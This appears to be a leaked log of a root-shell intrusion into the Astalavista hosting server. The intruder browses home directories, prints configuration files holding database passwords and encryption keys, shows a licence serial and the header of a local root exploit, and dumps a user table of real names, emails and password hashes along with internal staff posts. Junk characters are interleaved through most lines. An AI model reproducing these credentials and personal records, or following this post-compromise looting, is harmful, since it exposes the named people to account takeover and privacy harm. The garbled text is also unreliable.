0 O) D0 p) f* V& n5 Y3 k5 I-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile' X: j: w9 B9 S: Z) E  E" c
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc- j/ Q( Z1 F) g- q3 C
drwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains: ~& S0 I3 V% P8 G. H' P# z( t
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
3 H7 Q2 a+ K: c* e! \drwx——  2 astanet astanet 4096 Dec 23 12:18 mail
2 |' L4 C6 j: z4 Y* {! n: O-rw——-  1 astanet astanet  197 Jun  4 09:51 .mysql_history
7 I" F, y5 I8 A" D. g' D! ]3 qlrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
" d* E0 V, I  M3 N+ a' b1 I-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
" ?% r: X0 {, j6 ?( U) `  N5 V4 x! x1 Q1 N- T
sh-3.2# cd auth/4 t1 S5 h! o/ A. @$ Z8 F
sh-3.2# ls -la
1 i7 e3 j! e$ C& U4 utotal 28' W7 v1 U7 F$ X" v8 t
drwxr-xr-x 2 root    root    4096 Dec 23 16:00 .
& J7 g) w' i% _  I( y/ t9 |, r7 zdrwx–x–x 6 astanet astanet 4096 Jun  4 09:51 ..% d- g+ B8 M6 V
-rw-r–r– 1 root    root     321 Jan  5  2006 hackercontest.config.inc.php
/ O  v$ H3 ^$ K+ s-rw-r–r– 1 root    root     319 Jan  5  2006 hosting.config.inc.php
: B6 d# O1 h3 p' C/ H. k  \-rw-r–r– 1 root    root      24 Jun  4 09:38 .htadm_pwd
) B; Z5 I+ H9 _-rw-r–r– 1 root    root      49 Jan  5  2006 .htpasswd_newhosting& P! X3 C' m$ e/ I
-rw-r–r– 1 root    root      51 Oct 11  2006 .htwebalizer_pwd9 K" t  _0 l3 \8 [* m* n( o
: Y1 u  }6 w: N( H9 c; h- V
sh-3.2# cat hackercontest.config.inc.php
* |( k% G0 V8 x! A<?PHP
3 K( o3 T: d2 K: g: H: t# `1 H! B// Variabeln f?r Verbindung zur Datenbank //# l; X/ d7 |- ?6 r) \4 S$ T
$conxHost = ‘localhost’;                       // MySQL hostname4 @$ u" Y) \! C- Q
$conxUser = ‘hackercontest’;                                       // MySQL user  ]( Q, T$ [6 `. k& N2 j7 [
$conxPassword = ‘K6m@7dUc’;                    // MySQL password
) A4 a0 Q! J( a5 k$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish0 L3 f( ~' \; b& p+ G( c
?>2 \9 G9 Y9 o: \  K( j8 p
sh-3.2# cat hosting.config.inc.php, A* S1 @8 a& X% G
<?PHP
" ?$ d. n  w6 V5 |// Variabeln f?r Verbindung zur Datenbank /// u+ s- W/ Q" s% h
$conxHost = ‘localhost’;                       // MySQL hostname8 [4 _7 I# o1 H7 ?9 }3 ?" ?
$conxUser = ‘hostinguser’;                                 // MySQL user, ^* {5 P+ @& e* L$ |+ X) z
$conxPassword = ‘cXvB3981′;                    // MySQL password
4 Y: ^4 C: h& V, F3 Y$bfkey = ‘cXvB3981′;                                       // Encryption/Decryption Key for Blowfish
; h& M; p  S5 u) e1 a?>
1 P: n' q4 S3 m- ^( z3 G/ _" Z- q7 y1 m# J) u: k" t
sh-3.2# cd ..
* m9 K' e5 y- b! |sh-3.2# cd com, d; p5 m5 G# _) w* {1 i
sh-3.2# ls -la4 ~4 k9 ?/ n/ v, N  C% X
total 141208
1 P1 `7 p+ [0 `) Q% M- ndrwx–x–x 10 com  com       4096 Apr 28 12:40 .
0 ?/ A5 p5 ?8 ^5 }drwxr-xr-x 14 root root      4096 Mar 11 17:56 ..
% v1 o% y. p8 o) H- Sdrwx——  2 com  com       4096 Jun  4 04:04 backups
, H2 P$ z6 I. K4 A$ x2 Q-rw-r–r–  1 root root   2419504 Sep 28  2007 backup.sql
$ l. H" \" _1 k2 P/ Rdrwxr-xr-x  2 com  com       4096 May 12 15:20 backup_system
/ h& j' ^1 O- m9 B" q1 l; I-rw——-  1 com  com      21880 Jun  2 08:07 .bash_history7 e2 x3 a) d* y: Y7 O
-rw-r–r–  1 com  com         24 Sep 24  2007 .bash_logout
6 B. l  V1 t; x2 ~$ E2 q4 N-rw-r–r–  1 com  com        176 Sep 24  2007 .bash_profile0 A- o& l. j5 ]( L) P, n3 o% ~
-rw-r–r–  1 com  com        124 Sep 24  2007 .bashrc
$ g2 [6 n0 X) j' u0 Mdrwx–x–x  3 com  com       4096 Jan 29  2008 domains- \  b1 t! R' ^2 m
-rw-r–r–  1 com  com      16409 Jul 16  2008 FWUser.class.php.fixed% L. L$ k: G( D; j7 A3 X
drwxrwx—  3 com  mail      4096 Jan  6 19:24 imap
& U3 O0 k7 c! G. _+ X( H! L-rw——-  1 com  com         69 Nov 18  2008 .lesshst- _6 l* N$ c" ]
drwx——  2 com  com       4096 Sep 24  2007 mail
* d5 n' l$ D6 G- h! m, }-rw——-  1 com  com      13970 Mar 28 21:42 .mysql_history
3 E; l9 w* O8 _: ~- D$ p" A) _- kdrwxr-xr-x  2 com  com       4096 Aug 20  2008 .ncftp
" }+ C1 U" O* m. ?" z, l2 y# Hlrwxrwxrwx  1 com  com         37 Sep 24  2007 public_html -> ./domains/astalavista.com/public_html
: a7 Y& Y& b; L+ }6 ?4 T5 w-rw-r—–  1 com  mail        34 Sep 24  2007 .shadow1 w- C* Q- i: K7 D6 E" G
drwx——  2 com  com       4096 Aug 26  2008 .ssh
% e' t! Z/ P2 i# Y2 e2 {. S" t9 J% d-rwx——  1 com  com       8515 Feb 10  2008 t
: f1 M# }& T/ o2 y; Z$ E3 r-rw-rw-r–  1 com  com       6265 Feb 11  2008 t.c! w5 q+ A/ ~' i7 o4 u5 {" c3 y4 r/ ?( I  ]
drwxrwxr-x  2 com  com       4096 Jan 30 15:47 tmp
0 t) N" J# Q  ]. v" J, x-rw-rw-r–  1 com  com        617 May 20  2008 .toprc
  z3 G6 R, L' T7 \- S-rw-rw-r–  1 com  com  141851766 May 19  2008 version2-backup-20080519-0900.sql
: c& r* C. V$ I# h-rw——-  1 com  com      16629 Mar 28 21:46 .viminfo
3 U) `, S' C& e-rw-rw-r–  1 com  com         51 Aug 25  2008 .vimrc
7 P0 z4 {4 W0 z
6 p$ {4 h; ^5 j: v% Xsh-3.2# head t.c# G! w8 |( k- p/ o. b
/*5 p3 W- D! w3 L, s
* jessica_biel_naked_in_my_bed.c
8 {* z' q3 o) v, Y) v*! I( _- V, S  ?" e/ s
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
! x0 j$ Q- D. W8 ~: o* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
( _7 b, m' @5 h* Stejnak je to stare jak cyp a aj jakesyk rozbite.
4 R2 N$ P: N1 Y, z' u: }+ f*
# j  ]& ~0 Z$ }* O2 m9 V% D& q* Linux vmsplice Local Root Exploit( M# y* X3 R% t* u$ c  k; K
* By qaaz
; |# d% E6 J! z  |' F& U- _% [*  A% y3 j2 t8 k" {0 I6 e) n& p
9 T1 m, v6 u; j/ A0 `
sh-3.2# cd /6 h( V& s8 H! e  f1 x* W
sh-3.2# ls -la, |2 U8 ^# f+ D: j* `: h- m8 N
total 360$ \* s/ |% N/ U  U8 r# Q
drwxr-xr-x  25 root root   4096 Jun  3 02:43 .
+ g0 \( R: N, i. q- M/ ~drwxr-xr-x  25 root root   4096 Jun  3 02:43 ..
- m' ]8 u* V, _  F! W-rw——-   1 root root  10240 Jun  3 02:39 aquota.group
: V7 i( `  q- w+ ?-rw——-   1 root root  10240 Jun  3 02:39 aquota.user
/ r1 p3 F% T# n+ b2 h/ s-rw-r—–   1 root root    819 Jul 17  2008 astalavista.us.db
0 Q& ]! `7 U. T( v1 m' t- h1 c, N-rw-r–r–   1 root root      0 Jun  3 02:43 .autofsck2 D0 b" J3 Y5 u3 H# S' j
-rw-r–r–   1 root root      0 Sep 16  2007 .autorelabel
) h. Y0 I( p, L6 B0 ~. a% O" _drwxr-xr-x   3 root root   4096 Dec 29  2007 backup
: _& W; x" W0 `6 edrwxr-xr-x   2 root root   4096 Jun  4 04:03 bin4 G2 q5 r# S$ Y" w: }8 ~/ S
drwxr-xr-x   5 root root   4096 Jun  2 14:06 boot& n/ t/ R# U( {" U# t
drwxr-xr-x  11 root root   3620 Jun  3 02:43 dev
1 V2 c, F& z- u/ @+ O# d1 E7 a! mdrwxr-xr-x  84 root root  12288 Jun  4 03:16 etc! a8 }5 o" F( @8 o% {) @& t+ s  n
drwxr-xr-x  14 root root   4096 Mar 11 17:56 home
+ q  A+ {! t5 q5 E-rw-r–r–   1 root root  13387 Mar 20  2008 httpd.conf& ^9 W9 c# C4 v! Z/ Q5 n# V
drwxr-xr-x  11 root root   4096 Jun  4 04:02 lib
' L! k$ v0 a  K( |4 y3 Vdrwxr-xr-x   7 root root   4096 Jun  4 04:03 lib64
) d* l; K2 C( d$ u% q* e2 s- idrwx——   2 root root  16384 Sep 11  2007 lost+found6 ^; c" W. t4 B# \4 x. o
drwxr-xr-x   2 root root   4096 Mar 11 17:56 media" ?- J6 x7 }8 @6 o9 u
drwxr-xr-x   2 root root      0 Jun  3 02:43 misc, M7 ~+ k) U- I6 D( |& {
drwxr-xr-x   2 root root   4096 Mar 11 17:56 mnt1 t, Q4 @6 Z+ n2 x
-rw-r–r–   1 root root   5859 Feb  3  2008 mrtg.cfg
7 f+ b) ~9 `/ ]9 Rdrwxr-xr-x   2 root root      0 Jun  3 02:43 net7 k% _; f4 k- N" Q
drwxr-xr-x   3 root root   4096 Mar 11 17:56 opt
5 m; w- p. V4 X; Z" G$ idr-xr-xr-x 264 root root      0 Jun  3 02:42 proc
1 m0 ^+ k) Y0 g, Odrwxr-x—  15 root root   4096 Jun  4 08:40 root# {# p% g7 j* l! R
drwxr-xr-x   2 root root  12288 Jun  4 04:03 sbin
, V5 H$ e! p7 u1 m% {' e) O  Tdrwxr-xr-x   2 root root   4096 Mar 11 17:56 selinux
9 u" h9 a+ B! g+ l4 Sdrwxr-xr-x   2 root root   4096 Mar 11 17:56 srv
2 ]/ z: U+ _% K7 b4 ndrwxr-xr-x  11 root root      0 Jun  3 02:42 sys
4 A7 N3 p2 M5 c% r- A! |" ddrwxrwxrwt   4 root root 122880 Jun  4 10:35 tmp+ U) M9 a9 h) }: U
drwxr-xr-x  16 root root   4096 Jun  2 13:56 usr
8 W) m6 f, T6 z; X, ~drwxr-xr-x  26 root root   4096 Jun  4 03:16 var1 h$ x5 K) ]+ R$ q6 q6 l) E5 n8 d
; v' Q' D7 F: X- P5 O
sh-3.2# cd opt6 F; e# Q2 `1 G* |, g
sh-3.2# ls -la- [2 z3 M7 S+ a1 _) w) r
total 20# P/ u) _' Q1 `! v
drwxr-xr-x  3 root root 4096 Mar 11 17:56 .
, B. S0 C. n7 Q, R* X9 Udrwxr-xr-x 25 root root 4096 Jun  3 02:43 ..
# R. q, Y/ h1 ~6 D/ j( \drwxr-xr-x 15 root root 4096 Mar 20  2008 lsws0 q( b5 f1 ?2 S9 `9 ~2 E
, Y2 y- `) ?  V( t
sh-3.2# cd lsws/
# S1 J3 L8 P& E  h! q+ ^) fsh-3.2# ls -la- X* A# w8 V8 u2 e. C
total 108% g  b' p% w0 X$ _) I) @6 N
drwxr-xr-x 15 root   root    4096 Mar 20  2008 .0 r8 V, S7 ~0 a! d: H+ e. R
drwxr-xr-x  3 root   root    4096 Mar 11 17:56 ..* e" {" z& ]& |% D
drwxr-xr-x  8 root   root    4096 Mar 20  2008 add-ons
! p' F0 x& X2 F& J# Q: _' bdrwxr-xr-x 13 root   root    4096 May 29 15:10 admin
; S! L* T$ b; L$ ?) @! `8 f: T- |drwxr-xr-x  5 apache apache  4096 May 29 15:10 autoupdate
6 A- C+ L& c6 a5 F" @. ?/ u6 K5 _drwxr-xr-x  2 root   root    4096 May 29 15:10 bin
8 ]; J! i, I9 x) Z/ fdrwx——  4 apache apache  4096 Jun  3 02:43 conf
2 x9 O; h6 S, E# ]& ?1 [, Hdrwxr-xr-x  7 apache apache  4096 Mar 20  2008 DEFAULT
5 u/ x7 |: h$ b% z. b$ idrwxr-xr-x  2 root   root    4096 Sep 15  2008 docs
: u' `6 D# t3 I+ t  ^2 }drwxr-xr-x  2 root   root    4096 May 29 15:10 fcgi-bin
, G2 j+ D4 x( G: a+ y& x4 `1 Udrwxr-xr-x  2 root   root    4096 Sep 15  2008 lib
. w/ \, I9 G+ q-rw-r–r–  1 root   root    6959 May 29 15:10 LICENSE* O! P4 t, p8 |$ m0 H7 }1 c
-rw-r–r–  1 root   root    2214 May 29 15:10 LICENSE.OpenLDAP
% a0 F- e: S) ]  ~* Q* A" {1 r-rw-r–r–  1 root   root    6279 May 29 15:10 LICENSE.OpenSSL/ e8 q, d# h( D, G& x7 l( g
-rw-r–r–  1 root   root    3208 May 29 15:10 LICENSE.PHP, K5 q4 T% v! U* l7 C3 d6 R# f, @
drwxr-xr-x  2 root   root   20480 Jun  4 09:55 logs( L  Q" I4 A5 K' G& f1 k& ?
drwxr-xr-x  2 root   root    4096 Mar 20  2008 php
3 C7 i9 R2 h  |2 M9 [drwx——  2 apache apache  4096 Mar 20  2008 phpbuild/ }$ I- f' h. }9 R3 B
drwxr-xr-x  3 root   root    4096 Mar 20  2008 share
2 P, L8 N, b, C1 ^2 j# @-rw-r–r–  1 root   root       6 May 29 15:10 VERSION! W4 u" D, n3 w# \8 F& A
5 u; F* V& i2 _" n: M
sh-3.2# cd conf
5 w: u  w+ p2 w2 Csh-3.2# ls -la
6 _+ s+ X% X- I" V2 Vtotal 488 G+ q$ c0 I% }0 c5 k
drwx——  4 apache apache 4096 Jun  3 02:43 .6 D5 \' s1 }- A  s' I& A: S- n
drwxr-xr-x 15 root   root   4096 Mar 20  2008 ..
9 L. H' W$ c! K# G2 v7 xdrwx——  2 apache apache 4096 Mar 20  2008 cert' v2 k, F) x7 ]/ n# @
-rw-r–r–  1 apache apache 6668 May 29 15:13 httpd_config.xml$ G/ @" Q. V, d9 J( e+ ?
-rw——-  1 apache apache 6613 May 27 18:33 httpd_config.xml.bak7 u4 Y  s7 ]  v, j6 s% i
-rw-r–r–  1 root   apache    0 Jun  3 14:11 .last
' |9 z5 V6 K9 f2 d# b-rw——-  1 apache apache  256 May 29 15:10 license.key! c$ {' L; o& V
-rw——-  1 apache apache  256 Mar 21  2008 license.key.old
. V# _, ~, P+ A0 f4 G-rw——-  1 apache apache 3320 Mar 20  2008 mime.properties
; U* s5 {7 Q% a-rw——-  1 apache apache   20 May 29 15:10 serial.no
8 i& F( K8 {9 m2 _drwx——  2 apache apache 4096 Mar 20  2008 templates2 ^& D# c6 M- N8 U, I- ~
+ n* `2 ]- l0 J3 R/ C
sh-3.2# cat serial.no
/ U* F0 k1 E1 s! M8 M' D" ~IbDl-oVsO-CKqL-wVRa
) m' L. t: E. h* P1 s0 e& t! l" r% G8 v- Y, G& t
sh-3.2# mysql) x- U: L# ?& v, \
Welcome to the MySQL monitor.  Commands end with ; or \g.  `7 p0 o; ?2 R: q6 I3 i  A9 }& b8 x
Your MySQL connection id is 286844
9 J. i/ y# S! ^0 GServer version: 5.0.45-community-log MySQL Community Edition (GPL)
8 }/ {* S# W; h8 S9 A8 r0 q0 j) Z+ K: g5 [. Y6 M
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.$ a4 \: ?5 E( ]$ c0 t8 T! }& Y

: }4 v. y/ T& Q) Imysql> show databases;3 N, c2 e: w- t/ v
+———————–+
! _" a( `" k3 r2 J$ t| Database              |
, E1 Z0 Z8 n7 }) y. h/ k, Z& A3 V+———————–++ g0 b+ u+ q/ Q* e) J9 z6 x" q; T) C
| information_schema    |
" p: p$ d6 k& r6 c" A| astanet_ads           |' N  j% o7 h5 Z; W5 K$ Z( }# X
| astanet_mailing_lists |
2 g- X/ z1 W- B2 y| astanet_mediawiki     |& M2 b, }" V, k" x4 B0 i$ C
| astanet_membersystem  |; C0 E, {4 f5 ?9 S& G& |
| com_contrexx          |
. b$ V! z- ~+ q) V  z, D+ P, v| com_contrexx2         |
! u$ B; ]- e% J# X8 k| com_contrexx2_live    |* u* `8 |: ^, ]
| da_roundcube          |
- f' H, s5 ~0 Q| dolphin               |
9 Y' P3 z1 n! g+ M- i| ideapool              |
0 c  G. i- V: Q% M  ]+ w) V: U| mysql                 |
2 b& J+ @6 {/ ?$ O8 U| test                  |
$ ^% q% D) O" y) r0 `/ R% I| yourmaster            |
  S$ Q1 Y! u0 D9 G; L$ q, F9 ]) A+———————–+
  l$ o5 E9 D# y. S5 \14 rows in set (0.00 sec)
9 ?  B4 a5 i2 [8 D8 n3 [" S
' n4 s: o- h% f3 O" y) w% Pmysql> use ideapool( `& @) e! k8 ~
Database changed3 S" i; P( J; @% d' `7 K; M2 _
mysql> show tables;
9 z3 n. o7 |: q9 Z, g8 g+ ~+———————————–+2 j1 e( {' W2 Y/ G$ a  W
| Tables_in_ideapool                |
' Y; f8 g% K5 |, ^+———————————–+
2 `" V, t7 Q8 j| eventum_columns_to_display        |
; S8 }+ C4 k- `+ T9 k| eventum_custom_field              |
8 t6 v* P8 V! r. \9 h| eventum_custom_field_option       |
; ^' J/ M7 K' l  t| eventum_custom_filter             |
0 C- i7 x3 Q" a2 X9 k% z& t| eventum_customer_account_manager  |
# u. N) I0 D9 E, w- |9 T| eventum_customer_note             |
% s2 G2 n! U: ~4 O| eventum_email_account             |
5 |4 e6 Y. _2 [: u2 |: r! s8 j" v' G3 G| eventum_email_draft               |
$ ^) {) I! W% B6 S4 ]6 n3 z9 @6 ^* I| eventum_email_draft_recipient     |, p0 A) l! h' w0 d, ]: q
| eventum_email_response            |2 _& g: n) P" j+ E2 i
| eventum_faq                       |
7 K+ O% o! U7 s( y+ S1 C6 ]| eventum_faq_support_level         |
2 X8 q3 d+ g7 y! s| eventum_group                     |
; ?$ ?6 [% E: Q& D| eventum_history_type              |: j* G6 e1 t  }$ O
| eventum_irc_notice                |- h+ [& K% ~3 U- c% @3 Y& g
| eventum_issue                     |8 K% Q& d0 K5 F4 K
| eventum_issue_association         |( z) N* \! `) B# ?9 @9 u1 }
| eventum_issue_attachment          |
- U1 o0 t3 Q8 |1 v| eventum_issue_attachment_file     |$ c, h* V" k- k1 }, B
| eventum_issue_checkin             |
6 p  `* r$ A: g! i# ]0 }3 w| eventum_issue_custom_field        |  H. W$ E% _( c! y
| eventum_issue_history             |
4 D: U5 O4 W. ^8 b3 L' d. J| eventum_issue_quarantine          |4 A. v: I7 ]1 o5 L! l, q
| eventum_issue_requirement         |3 u4 ]- I, A" ?- N0 l
| eventum_issue_user                |4 F/ ?$ W/ @) j2 h/ Y+ d
| eventum_issue_user_replier        |
: o! v: T' Q0 T| eventum_link_filter               |
1 g$ Z/ h- s6 ^5 D; L0 k7 i1 D| eventum_mail_queue                |9 B; J  _! ]- I* a
| eventum_mail_queue_log            |
) ?2 c# ]% |$ _6 E5 X$ R8 a| eventum_news                      |. [* S+ b" W  v( a3 g9 W: c; S
| eventum_note                      |6 c5 o; ~- l! ^9 A9 b" n
| eventum_phone_support             |
. l+ u* }1 Z% r5 n' H7 v; |9 o) s| eventum_project                   |
0 `! _) B! B1 W# r' k1 v3 B  T! a| eventum_project_category          |
5 K( y% G0 j& s| eventum_project_custom_field      |
7 V! u9 H/ o- D; S2 [, r2 || eventum_project_email_response    |
6 d: s5 [* ]2 l* x7 Z+ A2 a* M| eventum_project_field_display     |% l, \/ O' o( g  P9 _: o6 k
| eventum_project_group             |5 E9 x7 _8 p2 @0 p6 D9 P
| eventum_project_link_filter       |
0 [' ?% U; c: q4 P7 k( \| eventum_project_news              |6 h  I& D, _# Z4 d+ _- K  I
| eventum_project_phone_category    |, [; G9 K& C# E& d
| eventum_project_priority          |
3 p) w6 ]( X% W" r4 @  _| eventum_project_release           |
0 S0 b, c7 L/ I4 A8 _| eventum_project_round_robin       |4 _! S1 e3 t2 B; X# L, P6 a% i
| eventum_project_status            |( V7 J% `- ^. {+ |! h6 \8 Q
| eventum_project_status_date       |1 i9 U$ }. d/ v: D/ O
| eventum_project_user              |
$ Z& Z- `! Y% f4 N+ B| eventum_reminder_action           |
) R& ?) L9 i; L| eventum_reminder_action_list      |$ W- r) m5 L+ B% }- G% o
| eventum_reminder_action_type      |! U7 A8 N, Y. G
| eventum_reminder_field            |( U0 T' Q+ r6 f: `! u
| eventum_reminder_history          |5 r. Z! B3 d& \6 w* [3 L  U7 \
| eventum_reminder_level            |
5 W  W. s. }$ p/ d' ?2 D| eventum_reminder_level_condition  |7 \& ~) i2 z3 b
| eventum_reminder_operator         |
5 s5 K' c. j- ~# c# L# A! E# w| eventum_reminder_priority         |( w9 t: r% B& O
| eventum_reminder_requirement      |( Q6 T7 b' w( M% N3 A5 ~
| eventum_reminder_triggered_action |( N1 H, l% S" H* q  u
| eventum_resolution                |
* t/ p! S% v4 c. R8 _" V| eventum_round_robin_user          |
% t1 a+ h4 ?; j0 {1 R0 C| eventum_search_profile            |
# u& _& R( n* x6 O% P| eventum_status                    |
: D" h7 O9 S7 Z9 h/ f| eventum_subscription              |# c0 |0 F" e4 _4 |2 x3 i
| eventum_subscription_type         |
( s; U+ B) q4 [, m# Y| eventum_support_email             |
/ ^( `* y( X) m* W0 D| eventum_support_email_body        |
0 l7 M2 X8 i' f1 g| eventum_time_tracking             |8 g( _! l0 \6 |
| eventum_time_tracking_category    |
/ u+ p3 q' G" y2 @4 h" @| eventum_user                      |
$ P, ?( O( B% v! T" G, |+———————————–+3 c: x, O& c8 \* N
69 rows in set (0.00 sec)
/ Q0 i# f( W# t$ s- S1 W
  u  g; S, y& I, }6 hmysql> describe eventum_user;
' I7 T5 |5 c9 b; t( l3 w% Y# u+————————-+——————+——+—–+———————+—————-+& C* P% ^/ _" L) u8 t* T9 L$ y
| Field                   | Type             | Null | Key | Default             | Extra          |
* e2 Y2 `4 n5 V+ \+————————-+——————+——+—–+———————+—————-+5 O+ ]* T1 U+ S6 T
| usr_id                  | int(11) unsigned | NO   | PRI | NULL                | auto_increment |
& ?3 e  F5 {+ _# u% |8 C# N5 r8 N| usr_grp_id              | int(11) unsigned | YES  | MUL | NULL                |                |  j! j. Y7 n: a1 H
| usr_customer_id         | int(11) unsigned | YES  |     | NULL                |                |4 u0 J, n* q1 A
| usr_customer_contact_id | int(11) unsigned | YES  |     | NULL                |                |
! T$ ]' D8 `" T0 X$ |" _| usr_created_date        | datetime         | NO   |     | 0000-00-00 00:00:00 |                |; q5 p1 s) G7 ~( I" R
| usr_status              | varchar(8)       | NO   |     | active              |                |
0 M0 }8 [8 I, L| usr_password            | varchar(32)      | NO   |     |                     |                |
. L8 F/ r! X$ u8 l| usr_full_name           | varchar(255)     | NO   |     |                     |                |
% {9 D# ~$ u; {5 o6 o| usr_email               | varchar(255)     | NO   | UNI |                     |                |
% k. ]  ]$ \1 o| usr_preferences         | longtext         | YES  |     | NULL                |                |: ]2 Q4 g+ h- |% E  |
| usr_sms_email           | varchar(255)     | YES  |     | NULL                |                |
" \  T  X: m3 n6 Q. [7 Q' U9 w| usr_clocked_in          | tinyint(1)       | YES  |     | 0                   |                |4 j1 A$ ^7 h8 @2 n# z; l9 z
| usr_lang                | varchar(5)       | YES  |     | NULL                |                |
% V$ ?# E! D' n7 E% Q0 \/ C+————————-+——————+——+—–+———————+—————-+
; O$ v9 }9 P2 S) H13 rows in set (0.00 sec)6 J9 J; \1 X" a8 ]5 b; J8 U, e- U

: h1 m1 f7 R* G8 g8 Q/ b8 w7 Fmysql> select usr_full_name,usr_email,usr_password from eventum_user;
" ?, R2 J1 r4 F, m" f+———————-+——————————-+———————————-+
" R$ X/ {+ e4 Z% R5 B| usr_full_name        | usr_email                     | usr_password                     |( _* f' z" ^7 b$ q+ \  V
+———————-+——————————-+———————————-+# R+ M% H& d, s6 I% [( N, W; J
| system               | 链接标记system-account@example.com    | 14589714398751513457adf349173434 |. O) o2 k, R$ x/ N% j- |. J" r3 p! b/ H
| Developer (Paulo)    | 链接标记paulo.santos@astalavista.ch   | 26a35a1cf8895c27fb37ef4cf149f7bb |
, Y) V7 \% o" A, p| Be1er0ph0r           | 链接标记be1er0ph0r@gmx.de             | 229766dc0ca1fb67160a8782321dfdce |
' Z4 J' J) h5 }. m2 Z| Admin                | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
5 ^9 n! a7 d1 R& U- M- b' q2 N| ADMIN                | 链接标记admin@astalavista.ch          | f6fdffe48c908deb0f4c3bd36c032e72 |) C0 n2 z& I  N  K& P7 f! d3 e
| USER                 | 链接标记user@astalavista.ch           | 5cc32e366c87c4cb49e4309b75f57d64 |" p2 r. G+ I; X0 h' f% G
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com       | f7735ab119023a8abb2301e67f81cd67 |
. P2 X- i9 w- A7 [3 B7 w# S0 {| Joao                 | 链接标记joao.pontes@astalavista.net   | f805c071d7c823b937448c54c047b9fd |/ l: G) M8 A2 s" ?) t& S
| Pascal               | 链接标记pm@astalavista.ch             | e10adc3949ba59abbe56e057f20f883e |/ j7 X4 {7 n' [+ A  A; A  o
| commander            | 链接标记commander@astalavista.com     | 932cd250918f881d41feb0b93883a926 |' Y0 p5 a6 R# f" \
| ishtus               | 链接标记ishtus@astalavista.com        | a587ffc88b3dbbba3fd2fe67af649ff0 |
3 a0 [  s. Y( P/ I4 u, Z| sykadul              | 链接标记sykadul@astalavista.com       | 20224a2f3eeb57a13a10b4df543c128e |. r/ G% n$ Y# v/ L5 a$ B
| Zach McElroy         | 链接标记admin@badfoo.net              | 33c5d4954da881814420f3ba39772644 |
- `# E- d, u  ]5 |  t| usb                  | 链接标记usbenigma@hushmail.com        | b513f22c3db6932855ad732f5f8a10a2 |! r* x" B6 s2 A
| cyph3r               | 链接标记cyph3r@astalavista.com        | 6e1e50017a945e874d52ec91f9ab2cee |
& S- p1 I8 O0 ~/ M8 p+———————-+——————————-+———————————-+& O5 r+ ]! y( k- S0 w) _$ U
15 rows in set (0.00 sec)+ u; z' a# z( Q0 E
: Z' R7 S* m) s: ]' J# d
mysql> select iss_description from eventum_issue where iss_id = 43;
# J$ v# u- V/ H% p; w0 B9 [! H: o$ E+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+) [( y+ p; }1 G/ Y
| iss_description                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                
' N! t6 V  b- V/ y" n/ y$ v( R6 ||
1 G* E6 N* [6 r) \+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
, D. z5 ]2 X4 Q| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
  k8 J! g/ R/ p  N1 y% b3 gconnected for 90 mins… 120mins… so what i propose is something like:- C  H' e( B  }4 h/ M
链接标记[url]http://www.surfthechannel.com/[/url]
' D: N4 ^  r$ p! z4 `7 jsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system7 ?) x1 _3 ~( C5 g  g+ ^
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t3 h7 n4 x: T" W0 z
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
/ n' j# ^. [. g+ ~% F4 f  ]if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
4 L$ J1 }1 `' Z( A% a3 X; Q9 p5 I2 r! U9 w0 [. \: U
We could also put advertisement during play on the flash video player itself… extra $$…1 ^6 [, p: n. Q; g: S1 _  t3 n

( a. K' t" d' ~$ ]3 p" w. [By sykadul |
* F9 w) x" f5 e) |+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+# S4 N3 y! s7 ~  z6 R
1 row in set (0.00 sec)# @8 V  f3 y  ]
) Y) ~' {! p$ v  q- ], ]
// Money and extra $$ is all they care about. remember that.: ]% m4 v* r1 z8 O% J

  b, K- J% S5 k/ r+ d* Ymysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
9 \( T: d  ]) d" w# z/ T+————————+——————————————————————————————————————————————————————————————————————————————-+( O3 i  m" s. v) n' _
| iss_summary            | iss_description                                                                                                                                                                                                                            C# r" q6 l0 O, c
|
0 t& ]$ C  S; v+————————+——————————————————————————————————————————————————————————————————————————————-+# ]& ^+ Q$ D, D: L; y3 f) p) b7 l' S( l
| Forum for REAL EXPERTS | Hello,& s% U( f$ _% h- @+ T* j  S- I

! \6 g. \0 M4 f0 s' x& s/ XIshtus and I,( s# d6 e, n; h+ g( K6 f
- _2 \$ g6 x$ N$ d% Z$ ?4 @
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide! r' M2 C& f9 _) j2 P/ U: S1 Y
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc../ X9 s0 B, y' K3 z) L
% x) J8 t- o8 H8 w& U5 z9 \, u
One example a friend of mine from coresecurity.com!
6 @& H% u. v2 |8 A7 D: j; F, j: g/ P2 @0 M2 u. X- M
We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..& v+ \$ @+ B/ e

0 T  Y3 x1 B4 \+ ~# S|4 E! F2 j/ r, I/ C$ L0 l
+————————+——————————————————————————————————————————————————————————————————————————————+
3 B+ j7 C7 G3 d6 z! R1 row in set (0.00 sec)# N$ Y4 c) e# m% u

